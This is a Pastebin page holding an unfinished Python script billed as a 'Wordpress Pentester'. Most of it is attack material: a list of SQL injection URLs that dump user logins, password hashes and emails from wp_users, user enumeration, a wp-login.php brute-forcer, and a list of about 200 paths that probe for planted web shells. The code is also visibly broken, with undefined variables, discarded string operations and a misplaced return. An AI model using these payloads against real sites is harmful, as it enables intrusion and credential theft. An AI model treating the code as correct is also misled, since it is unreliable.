API tools faq
paste
Advertisement
matrixcoder

Wordpress Pentester

matrixcoder
Dec 15th, 2014
1,238
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
Python 18.08 KB | None | 0 0
raw download clone embed print report
  1. #!c:/Python27/python.exe
  2.  
  3. # Little Code to do security tests on wordpress Link it together to use it
  4. # Wroten by MatriX Coder (Mohamed Aziz From Tunisia :D) you can edit my rigths
  5. # I didn't wrote all the code | Wroten Under windows XP VM in geany :D
  6. # I didn't complete the code and some parts won't work ! Good luck :D
  7.  
  8. import urllib2
  9. import urllib
  10. import re
  11. import cookielib
  12. import json
  13.  
  14. class Wordpress :
  15.     def __init__(self, site) :
  16.         if 'http://' not in site :
  17.             'http://' + site
  18.         if site[-1] != '/' :
  19.             site + '/'
  20.         self.site = site
  21.        
  22.     def scanDB(self) :
  23.         """
  24.         serch common wordpress vulnerabilities from
  25.         a little databese
  26.         Wroten by By M.tucX
  27.         """
  28.         vuln = {}
  29.         dzx = { "wp-content/themes/dandelion/" : "www.exploit-db.com/exploits/31571/",
  30.         "wp-content/uploads/feuGT_uploads/feuGT_1790_43000000_948109840.php" : "http://www.exploit-db.com/exploits/31570/" ,
  31.         "wp-content/plugins/formcraft/form.php?id=1" : "Wordpress formcraft Plugin Sql Injection",
  32.         "wp-content/themes/kernel-theme/functions/upload-handler.php" : "http://www.exploit-db.com/exploits/29482/",
  33.         "wp-content/themes/saico/framework/_scripts/valums_uploader/php.php" : "http://www.exploit-db.com/exploits/29150/",
  34.         "wp-content/themes/ThinkResponsive/includes/uploadify/upload_settings_image.php" : "http://www.exploit-db.com/exploits/29332/",
  35.         "wp-content/themes/rockstar-theme/functions/upload-handler.php" :"http://www.exploit-db.com/exploits/29946/",
  36.         "wp-content/plugins/page-flip-image-gallery/upload.php" : "http://www.exploit-db.com/exploits/30084/",
  37.         "wp-content/themes/area53/framework/_scripts/valums_uploader/php.php" : "http://www.exploit-db.com/exploits/29068/",
  38.         "wp-content/plugins/complete-gallery-manager/frames/upload-images.php" : "http://www.exploit-db.com/exploits/28377/" }
  39.        
  40.         for xpl, poc in dzx.items() :
  41.             if urllib.urlopen(self.site).getcode() not in [400,401,404] :
  42.                 vuln[xpl] = poc
  43.        
  44.         return vuln
  45.        
  46.     def sqliDB(self) :
  47.         """
  48.         search for sql injection vulnerabilities
  49.         (this piece of code was written in 2010
  50.         by vyc0d old but gold it still work on some sites)
  51.         """
  52.         # Writen by vyc0d
  53.         sqli = []
  54.         sqls = ["index.php?cat=999%20UNION%20SELECT%20null,CONCAT(CHAR(58),user_pass,CHAR(58),user_login,CHAR(58)),null,null,null%20FROM%20wp_users/*",
  55.         "index.php?cat=%2527%20UNION%20SELECT%20CONCAT(CHAR(58),user_pass,CHAR(58),user_login,CHAR(58))%20FROM%20wp_users/*",
  56.         "index.php?exact=1&sentence=1&s=%b3%27)))/**/AND/**/ID=-1/**/UNION/**SELECT**/1,2,3,4,5,user_pass,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24/**/FROM/**/wp_users%23",
  57.         "index?page_id=115&forumaction=showprofile&user=1+union+select+null,concat(user_login,0x2f,user_pass,0x2f,user_email),null,null,null,null,null+from+wp_tbv_users/*",
  58.         "wp-content/plugins/wp-cal/functions/editevent.php?id=-1%20union%20select%201,concat(user_login,0x3a,user_pass,0x3a,user_email),3,4,5,6%20from%20wp_users--",
  59.         "wp-content/plugins/fgallery/fim_rss.php?album=-1%20union%20select%201,concat(user_login,0x3a,user_pass,0x3a,user_email),3,4,5,6,7%20from%20wp_users--",
  60.         "wp-content/plugins/wassup/spy.php?to_date=-1%20group%20by%20id%20union%20select%20null,null,null,conca(0x7c,user_login,0x7c,user_pass,0x7c),null,null,null,null,null,null,null,null%20%20from%20wp_users",
  61.         "wordspew-rss.php?id=-998877/**/UNION/**/SELECT/**/0,1,concat(0x7c,user_login,0x7c,user_pass,0x7c),concat(0x7c,user_login,0x7c,user_pass,0x7c),4,5/**/FROM/**/wp_users",
  62.         "wp-content/plugins/st_newsletter/shiftthis-preview.php?newsletter=-1/**/UNION/**/SELECT/**/concat(0x7c,user_login,0x7c,user_pass,0x7c)/**/FROM/**/wp_users",
  63.         "sf-forum?forum=-99999/**/UNION/**/SELECT/**/concat(0x7c,user_login,0x7c,user_pass,0x7c)/**/FROM/**/wp_users/*",
  64.         "sf-forum?forum=-99999/**/UNION/**/SELECT/**/0,concat(0x7c,user_login,0x7c,user_pass,0x7c),0,0,0,0,0/**/FROM/**/wp_users/*",
  65.         "forums?forum=1&topic=-99999/**/UNION/**/SELECT/**/concat(0x7c,user_login,0x7c,user_pass,0x7c)/**/FROM/**/wp_users/*",
  66.         "index?page_id=2&album=S@BUN&photo=-333333%2F%2A%2A%2Funion%2F%2A%2A%2Fselect/**/concat(0x7c,user_login,0x7c,user_pass,0x7c)/**/from%2F%2A%2A%2Fwp_users/**WHERE%20admin%201=%201",
  67.         "wp-download.php?dl_id=null/**/union/**/all/**/select/**/concat(user_login,0x3a,user_pass)/**/from/**/wp_users/*",
  68.         "wpSS/ss_load.php?ss_id=1+and+(1=0)+union+select+1,concat(user_login,0x3a,user_pass,0x3a,user_email),3,4+from+wp_users--&display=plain",
  69.         "wp-content/plugins/nextgen-smooth-gallery/nggSmoothFrame.php?galleryID=-99999/**/UNION/**/SELECT/**/concat(0x7c,user_login,0x7c,user_pass,0x7c)/**/FROM/**/wp_users/*",
  70.         "myLDlinker.php?url=-2/**/UNION/**/SELECT/**/concat(0x7c,user_login,0x7c,user_pass,0x7c)/**/FROM/**/wp_users/*",
  71.         "?page_id=2/&forum=all&value=9999+union+select+(select+concat_ws(0x3a,user_login,user_pass)+from+wp_users+LIMIT+0,1)--+&type=9&search=1&searchpage=2",
  72.         "wp-content/themes/limon/cplphoto.php?postid=-2+and+1=1+union+all+select+1,2,concat(user_login,0x3a,user_pass),4,5,6,7,8,9,10,11,12+from+wp_users--&id=2",
  73.         "?event_id=-99999/**/UNION/**/SELECT/**/concat(0x7c,user_login,0x7c,user_pass,0x7c)/**/FROM/**/wp_users/*",
  74.         "wp-content/plugins/photoracer/viewimg.php?id=-99999+union+select+0,1,2,3,4,user(),6,7,8/*",
  75.         "?page_id=2&id=-999+union+all+select+1,2,3,4,group_concat(user_login,0x3a,user_pass,0x3a,user_email),6+from+wp_users/*",
  76.         "wp-content/plugins/wp-forum/forum_feed.php?thread=-99999+union+select+1,2,3,concat(user_login,0x2f,user_pass,0x2f,user_email),5,6,7+from+wp_users/*",
  77.         "mediaHolder.php?id=-9999/**/UNION/**/SELECT/**/concat(User(),char(58),Version()),2,3,4,5,6,Database()--",
  78.         "wp-content/plugins/st_newsletter/stnl_iframe.php?newsletter=-9999+UNION+SELECT+concat(user_login,0x3a,user_pass,0x3a,user_email)+FROM+wp_users--",
  79.         "wp-content/plugins/wpSS/ss_load.php?ss_id=1+and+(1=0)+union+select+1,concat(user_login,0x3a,user_pass,0x3a,user_email),3,4+from+wp_users--&display=plain",
  80.         "wp-download.php?dl_id=null/**/union/**/all/**/select/**/concat(user_login,0x3a,user_pass)/**/from/**/wp_users/*"]
  81.        
  82.         for sql in sqls :
  83.             html = urllib.urlopen(self.site+sql).read()
  84.             md5s = re.findall("[a-f0-9]"*32,source)
  85.             if md5s :
  86.                 sqli.append(self.site+sql)
  87.                
  88.             return sqli
  89.          
  90.     def pathDiscloure(self) :
  91.         """
  92.         full path disclosure vulnerability
  93.         """
  94.         error = urllib2.urlopen(self.site).read()
  95.         if error is not None :
  96.             return None
  97.         else :
  98.             return ("[" + self.body.replace("<b>", '').replace("</b>", "").replace("<br />", "").strip("\n")+"]").strip()
  99.    
  100.     def findPlugins(self, pluginsfile) :
  101.         """
  102.         find target plugins
  103.         """
  104.         foundplugins = []
  105.         self.pluginsfile = pluginsfile
  106.         for line in open(self.pluginsfile, 'r').read().rsplit():
  107.             if line :
  108.                 respcode = urllib.urlopen(self.site+ 'wp-content/plugins/' + line + '/').getcode()
  109.                 if respcode != 404 :
  110.                     print line
  111.                     foundplugins.append(line)
  112.        
  113.         return foundplugins
  114.        
  115.     def getVersionRDme(self) :
  116.         """
  117.         get wordpress version number
  118.         """
  119.         # get version from readme.html
  120.         html = urllib2.urlopen(self.site + 'readme.html').read()
  121.         return re.search('Version (.*)', html).group(1)
  122.        
  123.     def getUsers(self, nbusers) :
  124.             """
  125.             get wordpress users
  126.             """
  127.             userlist = []
  128.             i = 1
  129.             while( i <= nbusers ) :
  130.                 url = self.site + '?author=%i' % i
  131.                 try:
  132.                     html = urllib2.urlopen(url).read()
  133.                 except urllib2.URLError :
  134.                     print '[-] The page returned ->', urllib.urlopen(url).getcode()    
  135.                        
  136.                 re1 = re.findall("<title>(.*?)</title>" , html)
  137.                 user = re.search("(.*?) |" , re1[0]).group(1)
  138.                 userlist.append(user)      
  139.                 i += 1
  140.                
  141.             return userlist
  142.            
  143.     def bruteForce(self, user, passwdfile) :
  144.         """
  145.         bruteforce wordpress (wp-login.php)
  146.         """
  147.         for passwd in open(passwdfile, 'r').read().rsplit() :
  148.             cj = cookielib.CookieJar()
  149.             opener = urllib2.build_opener(urllib2.HTTPCookieProcessor(cj))
  150.             login_data = urllib.urlencode({'log' : user, 'pwd' : passwd})
  151.             opener.open(str(site) + 'wp-login.php', login_data)
  152.             resp = opener.open(str(site)+'wp-admin')
  153.             final = resp.read()
  154.             if '<li id="wp-admin-bar-logout">' in final:
  155.                 return user + ':' + passwd
  156.                 break
  157.    
  158.     def shellFinder(self, shellsfile) :
  159.         foundshells = []
  160.         shells = ['wp-content/plugins/akismet/akismet.php',
  161.         'wp-content/plugins/disqus-comment-system/disqus.php',
  162.         'wp-content/plugins/akismet/akismet.php',
  163.         'wp-content/plugins/akismet/admin.php#',
  164.         'wp-content/plugins/google-sitemap-generator/sitemap-core.php#',
  165.         'wp-content/plugins/akismet/widget.php#',
  166.         'wp-content/plugins/disqus-comment-system/disqus.php',
  167.         'wp-content/plugins/count-per-day/js/yc/d00.php',
  168.         'wp-content/plugins/disqus-comment-system/Sym.php',
  169.         'wp-content/plugins/disqus-comment-system/c22.php',
  170.         'wp-content/plugins/disqus-comment-system/c100.php',
  171.         'wp-content/plugins/disqus-comment-system/configuration.php',
  172.         'wp-content/plugins/disqus-comment-system/g.php',
  173.         'wp-content/plugins/disqus-comment-system/xx.pl',
  174.         'wp-content/plugins/disqus-comment-system/ls.php',
  175.         'wp-content/plugins/disqus-comment-system/Cpanel.php',
  176.         'wp-content/plugins/disqus-comment-system/k.php',
  177.         'wp-content/plugins/disqus-comment-system/zone-h.php',
  178.         'wp-content/plugins/disqus-comment-system/tmp/user.php',
  179.         'wp-content/plugins/disqus-comment-system/tmp/Sym.php',
  180.         'wp-content/plugins/disqus-comment-system/cp.php',
  181.         'wp-content/plugins/disqus-comment-system/tmp/madspotshell.php',
  182.         'wp-content/plugins/disqus-comment-system/tmp/root.php',
  183.         'wp-content/plugins/disqus-comment-system/tmp/whmcs.php',
  184.         'wp-content/plugins/disqus-comment-system/tmp/index.php',
  185.         'wp-content/plugins/disqus-comment-system/tmp/2.php',
  186.         'wp-content/plugins/disqus-comment-system/tmp/dz.php',
  187.         'wp-content/plugins/disqus-comment-system/tmp/cpn.php',
  188.         'wp-content/plugins/disqus-comment-system/tmp/changeall.php',
  189.         'wp-content/plugins/disqus-comment-system/tmp/Cgishell.pl',
  190.         'wp-content/plugins/disqus-comment-system/tmp/sql.php',
  191.         'wp-content/plugins/disqus-comment-system/0day.php',
  192.         'wp-content/plugins/disqus-comment-system/tmp/admin.php',
  193.         'wp-content/plugins/disqus-comment-system/L3b.php',
  194.         'wp-content/plugins/disqus-comment-system/d.php',
  195.         'wp-content/plugins/disqus-comment-system/tmp/d.php',
  196.         'wp-content/plugins/disqus-comment-system/tmp/L3b.php',
  197.         'wp-content/plugins/disqus-comment-system/sado.php',
  198.         'wp-content/plugins/disqus-comment-system/admin1.php',
  199.         'wp-content/plugins/akismet/WSO.php',
  200.         'wp-content/plugins/akismet/dz.php',
  201.         'wp-content/plugins/akismet/DZ.php',
  202.         'wp-content/plugins/akismet/cpanel.php',
  203.         'wp-content/plugins/akismet/cpn.php',
  204.         'wp-content/plugins/akismet/sos.php',
  205.         'wp-content/plugins/akismet/term.php',
  206.         'wp-content/plugins/akismet/Sec-War.php',
  207.         'wp-content/plugins/akismet/sql.php',
  208.         'wp-content/plugins/akismet/ssl.php',
  209.         'wp-content/plugins/akismet/info.php',
  210.         'wp-content/plugins/akismet/egyshell.php',
  211.         'wp-content/plugins/akismet/Sym.php',
  212.         'wp-content/plugins/akismet/c22.php',
  213.         'wp-content/plugins/akismet/c100.php',
  214.         'wp-content/plugins/akismet/configuration.php',
  215.         'wp-content/plugins/akismet/g.php',
  216.         'wp-content/plugins/akismet/xx.pl',
  217.         'wp-content/plugins/akismet/ls.php',
  218.         'wp-content/plugins/akismet/Cpanel.php',
  219.         'wp-content/plugins/akismet/k.php',
  220.         'wp-content/plugins/akismet/zone-h.php',
  221.         'wp-content/plugins/akismet/tmp/user.php',
  222.         'wp-content/plugins/akismet/tmp/Sym.php',
  223.         'wp-content/plugins/akismet/cp.php',
  224.         'wp-content/plugins/akismet/tmp/madspotshell.php',
  225.         'wp-content/plugins/akismet/tmp/root.php',
  226.         'wp-content/plugins/akismet/tmp/whmcs.php',
  227.         'wp-content/plugins/akismet/tmp/index.php',
  228.         'wp-content/plugins/akismet/tmp/2.php',
  229.         'wp-content/plugins/akismet/tmp/dz.php',
  230.         'wp-content/plugins/akismet/tmp/cpn.php',
  231.         'wp-content/plugins/akismet/tmp/changeall.php',
  232.         'wp-content/plugins/akismet/tmp/Cgishell.pl',
  233.         'wp-content/plugins/akismet/tmp/sql.php',
  234.         'wp-content/plugins/akismet/0day.php',
  235.         'wp-content/plugins/akismet/tmp/admin.php',
  236.         'wp-content/plugins/akismet/L3b.php',
  237.         'wp-content/plugins/akismet/d.php',
  238.         'wp-content/plugins/akismet/tmp/d.php',
  239.         'wp-content/plugins/akismet/tmp/L3b.php',
  240.         'wp-content/plugins/akismet/sado.php',
  241.         'wp-content/plugins/akismet/admin1.php',
  242.         'wp-content/plugins/akismet/upload.php',
  243.         'wp-content/plugins/akismet/up.php',
  244.         'wp-content/plugins/akismet/vb.zip',
  245.         'wp-content/plugins/akismet/vb.rar',
  246.         'wp-content/plugins/akismet/admin2.asp',
  247.         'wp-content/plugins/akismet/uploads.php',
  248.         'wp-content/plugins/akismet/sa.php',
  249.         'wp-content/plugins/akismet/sysadmins/',
  250.         'wp-content/plugins/akismet/admin1/',
  251.         'wp-content/plugins/akismet/sniper.php',
  252.         'wp-content/plugins/akismet//ftp.txt',
  253.         'wp-content/plugins/akismet//user.txt',
  254.         'wp-content/plugins/akismet//site.txt',
  255.         'wp-content/plugins/akismet//error_log',
  256.         'wp-content/plugins/akismet//error',
  257.         'wp-content/plugins/akismet//cpanel',
  258.         'wp-content/plugins/akismet//awstats',
  259.         'wp-content/plugins/akismet//site.sql',
  260.         'wp-content/plugins/akismet//vb.sql',
  261.         'wp-content/plugins/akismet//forum.sql',
  262.         'wp-content/plugins/akismet/r00t-s3c.php',
  263.         'wp-content/plugins/akismet/c.php',
  264.         'wp-content/plugins/akismet//backup.sql',
  265.         'wp-content/plugins/akismet//back.sql',
  266.         'wp-content/plugins/akismet//data.sql',
  267.         'wp-content/plugins/akismet/wp.rar/',
  268.         'wp-content/plugins/akismet/asp.aspx',
  269.         'wp-content/plugins/akismet/tmp/vaga.php',
  270.         'wp-content/plugins/akismet/tmp/killer.php',
  271.         'wp-content/plugins/akismet/whmcs.php',
  272.         'wp-content/plugins/akismet/abuhlail.php',
  273.         'wp-content/plugins/akismet/tmp/killer.php',
  274.         'wp-content/plugins/akismet/tmp/domaine.pl',
  275.         'wp-content/plugins/akismet/tmp/domaine.php',
  276.         'wp-content/plugins/akismet/useradmin/',
  277.         'wp-content/plugins/akismet/tmp/d0maine.php',
  278.         'wp-content/plugins/akismet/d0maine.php',
  279.         'wp-content/plugins/akismet/tmp/sql.php',
  280.         'wp-content/plugins/akismet/X.php',
  281.         'wp-content/plugins/akismet/123.php',
  282.         'wp-content/plugins/akismet/m.php',
  283.         'wp-content/plugins/akismet/b.php',
  284.         'wp-content/plugins/akismet/up.php',
  285.         'wp-content/plugins/akismet/tmp/dz1.php',
  286.         'wp-content/plugins/akismet/dz1.php',
  287.         'wp-content/plugins/akismet/forum.zip',
  288.         'wp-content/plugins/akismet/Symlink.php',
  289.         'wp-content/plugins/akismet/Symlink.pl',
  290.         'wp-content/plugins/akismet/forum.rar',
  291.         'wp-content/plugins/akismet/joomla.zip',
  292.         'wp-content/plugins/akismet/joomla.rar',
  293.         'wp-content/plugins/akismet/wp.php',
  294.         'wp-content/plugins/akismet/buck.sql',
  295.         'wp-content/plugins/akismet/sysadmin.php',
  296.         'wp-content/plugins/akismet/images/c99.php',
  297.         'wp-content/plugins/akismet/xd.php',
  298.         'wp-content/plugins/akismet/c100.php',
  299.         'wp-content/plugins/akismet/spy.aspx',
  300.         'wp-content/plugins/akismet/xd.php',
  301.         'wp-content/plugins/akismet/tmp/xd.php',
  302.         'wp-content/plugins/akismet/sym/root/home/',
  303.         'wp-content/plugins/akismet/billing/killer.php',
  304.         'wp-content/plugins/akismet/tmp/upload.php',
  305.         'wp-content/plugins/akismet/tmp/admin.php',
  306.         'wp-content/plugins/akismet/Server.php',
  307.         'wp-content/plugins/akismet/tmp/uploads.php',
  308.         'wp-content/plugins/akismet/tmp/up.php',
  309.         'wp-content/plugins/akismet/Server/',
  310.         'wp-content/plugins/akismet/wp-admin/c99.php',
  311.         'wp-content/plugins/akismet/tmp/priv8.php',
  312.         'wp-content/plugins/akismet/priv8.php',
  313.         'wp-content/plugins/akismet/cgi.pl/',
  314.         'wp-content/plugins/akismet/tmp/cgi.pl',
  315.         'wp-content/plugins/akismet/downloads/dom.php',
  316.         'wp-content/plugins/akismet/webadmin.html',
  317.         'wp-content/plugins/akismet/admins.php',
  318.         'wp-content/plugins/akismet/bluff.php',
  319.         'wp-content/plugins/akismet/king.jeen',
  320.         'wp-content/plugins/akismet/admins/',
  321.         'wp-content/plugins/akismet/admins.asp',
  322.         'wp-content/plugins/akismet/admins.php',
  323.         'wp-content/plugins/akismet/wp.zip',
  324.         'wp-content/plugins/akismet/disqus.php',
  325.         'wp-content/plugins/google-sitemap-generator//cpanel',
  326.         'wp-content/plugins/google-sitemap-generator//awstats',
  327.         'wp-content/plugins/google-sitemap-generator//site.sql',
  328.         'wp-content/plugins/google-sitemap-generator//vb.sql',
  329.         'wp-content/plugins/google-sitemap-generator//forum.sql',
  330.         'wp-content/plugins/google-sitemap-generator/r00t-s3c.php',
  331.         'wp-content/plugins/google-sitemap-generator/c.php',
  332.         'wp-content/plugins/google-sitemap-generator//backup.sql',
  333.         'wp-content/plugins/google-sitemap-generator//back.sql',
  334.         'wp-content/plugins/google-sitemap-generator//data.sql',
  335.         'wp-content/plugins/google-sitemap-generator/wp.rar/',
  336.         'wp-content/plugins/google-sitemap-generator/asp.aspx',
  337.         'wp-content/plugins/google-sitemap-generator/tmp/xd.php',
  338.         'wp-content/plugins/google-sitemap-generator/sym/root/home/',
  339.         'wp-content/plugins/google-sitemap-generator/billing/killer.php',
  340.         'wp-content/plugins/google-sitemap-generator/tmp/upload.php',
  341.         'wp-content/plugins/google-sitemap-generator/tmp/admin.php',
  342.         'wp-content/plugins/google-sitemap-generator/Server.php',
  343.         'wp-content/plugins/google-sitemap-generator/tmp/uploads.php',
  344.         'wp-content/plugins/google-sitemap-generator/tmp/up.php',
  345.         'wp-content/plugins/google-sitemap-generator/Server/',
  346.         'wp-content/plugins/google-sitemap-generator/wp-admin/c99.php',
  347.         'wp-content/plugins/google-sitemap-generator/tmp/priv8.php',
  348.         'wp-content/plugins/google-sitemap-generator/priv8.php',
  349.         'wp-content/plugins/google-sitemap-generator/cgi.pl/',
  350.         'wp-content/plugins/google-sitemap-generator/tmp/cgi.pl',
  351.         'wp-content/plugins/google-sitemap-generator/downloads/dom.php',
  352.         'wp-content/plugins/google-sitemap-generator/webadmin.html',
  353.         'wp-content/plugins/google-sitemap-generator/admins.php',
  354.         'wp-content/plugins/google-sitemap-generator/bluff.php',
  355.         'wp-content/plugins/google-sitemap-generator/king.jeen',
  356.         'wp-content/plugins/google-sitemap-generator/admins/',
  357.         'wp-content/plugins/google-sitemap-generator/admins.asp',
  358.         'wp-content/plugins/google-sitemap-generator/admins.php',
  359.         'wp-content/plugins/google-sitemap-generator/wp.zip',
  360.         'wp-content/plugins/google-sitemap-generator/sitemap-core.php']
  361.        
  362.         for shell in shells :
  363.             respcode = urllib.urlopen(self.site + shell).getcode()
  364.             if respcode == 200 :
  365.                 foundshells.append(self.site + shell)
  366.                
  367.         return foundshells     
  368.  
  369.     def versionScan(self, wp_vulns) :
  370.         json_data = open(wp_vulns)
  371.         data = json.load(json_data)
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!